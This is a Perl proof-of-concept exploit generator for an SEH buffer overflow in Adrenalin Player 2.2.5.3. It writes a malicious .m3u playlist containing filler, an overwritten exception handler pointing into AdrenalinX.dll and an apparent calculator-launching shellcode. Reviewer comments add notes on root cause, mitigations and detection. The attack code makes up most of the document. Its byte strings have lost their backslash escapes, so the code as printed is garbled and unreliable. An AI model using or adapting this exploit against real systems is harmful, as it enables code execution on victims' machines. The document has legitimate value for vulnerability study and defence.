
# Title : Adrenalin Player 2.2.5.3 - Buffer Overflow Exploit (SEH)
# Published : 2013-05-13
# Author :


# Exploit Title: Adrenalin Player 2.2.5.3 Buffer Overflow Exploit(SEH)
# http://software.naver.com/software/summary.nhn?softwareId=MFS_100099
# Author: seaofglass (seaofglass@korea.com)
# Version : 2.2.5.3
# Tested on: WinXP3 KOR, Win7 KOR

# Proof-of-concept generator: concatenates five strings and writes them to a
# playlist file in the current directory. Per the header above, the file is
# meant to demonstrate an SEH-based buffer overflow in Adrenalin Player 2.2.5.3
# when the player parses the playlist.
#
# NOTE(review): the string literals below are kept exactly as they appear on
# this page. As shown they contain no backslash escapes, so each "x90" is the
# three characters 'x', '9', '0' and each "xNN" in $calc is plain text.
#
# Defensive notes:
#  - Root cause is presumably an unbounded copy of a playlist entry into a
#    fixed-size stack buffer (inferred from the title; the vulnerable code is
#    not shown here). The fix is length validation in the parser.
#  - The handler value is a hard-coded address inside AdrenalinX.dll, which
#    suggests that module is not protected by SafeSEH/ASLR -- TODO confirm.
#    SEHOP, DEP and ASLR are the relevant platform mitigations.
#  - For detection: a .m3u whose single entry is thousands of bytes long with
#    no line breaks is anomalous for a playlist.

# Output file name; relative path, so it lands in the current directory.
my $file = "adrenalin.m3u";
# Filler written first: the literal repeated 2172 times.
my $junk = "x90" x 2172;
# 32-bit little-endian value; by its name, the "next handler" field of the
# overwritten exception record.
my $nseh = pack('V', 0x909006EB);
# 32-bit little-endian value; by its name, the handler field of that record.
my $seh = pack('V', 0x1016f313); #ppr from AdrenalinX.dll
# Short padding between the handler record and the payload (literal x 16).
my $nop = "x90" x 16;
# Payload string. The name suggests a demonstration payload that launches the
# calculator -- not verified from this page.
my $calc =
"xbax38xdcx15x77xddxc7xd9x74x24xf4x5dx33xc9" .
"xb1x33x83xc5x04x31x55x0ex03x6dxd2xf7x82x71" .
"x02x7ex6cx89xd3xe1xe4x6cxe2x33x92xe5x57x84" .
"xd0xabx5bx6fxb4x5fxefx1dx11x50x58xabx47x5f" .
"x59x1dx48x33x99x3fx34x49xcex9fx05x82x03xe1" .
"x42xfexecxb3x1bx75x5ex24x2fxcbx63x45xffx40" .
"xdbx3dx7ax96xa8xf7x85xc6x01x83xcexfex2axcb" .
"xeexffxffx0fxd2xb6x74xfbxa0x49x5dx35x48x78" .
"xa1x9ax77xb5x2cxe2xb0x71xcfx91xcax82x72xa2" .
"x08xf9xa8x27x8dx59x3ax9fx75x58xefx46xfdx56" .
"x44x0cx59x7ax5bxc1xd1x86xd0xe4x35x0fxa2xc2" .
"x91x54x70x6ax83x30xd7x93xd3x9cx88x31x9fx0e" .
"xdcx40xc2x44x23xc0x78x21x23xdax82x01x4cxeb" .
"x09xcex0bxf4xdbxabxe4xbex46x9dx6cx67x13x9c" .
"xf0x98xc9xe2x0cx1bxf8x9axeax03x89x9fxb7x83" .
"x61xedxa8x61x86x42xc8xa3xe5x05x5ax2fxc4xa0" .
"xdaxcax18";

# Two-argument open with the mode glued to the file name, on an undeclared
# package variable $FILE (the script has no "use strict"). The return values
# of open, print and close are not checked.
open($FILE, ">$file");
# Layout written to the file: filler, next-handler value, handler value,
# padding, payload -- in that order, with no separators or trailing newline.
print $FILE $junk . $nseh . $seh . $nop . $calc;
close($FILE);

# Printed unconditionally, even if the open or write above failed. The
# message ends with a literal 'n', not a newline escape.
print "m3u poc file created successfully.n";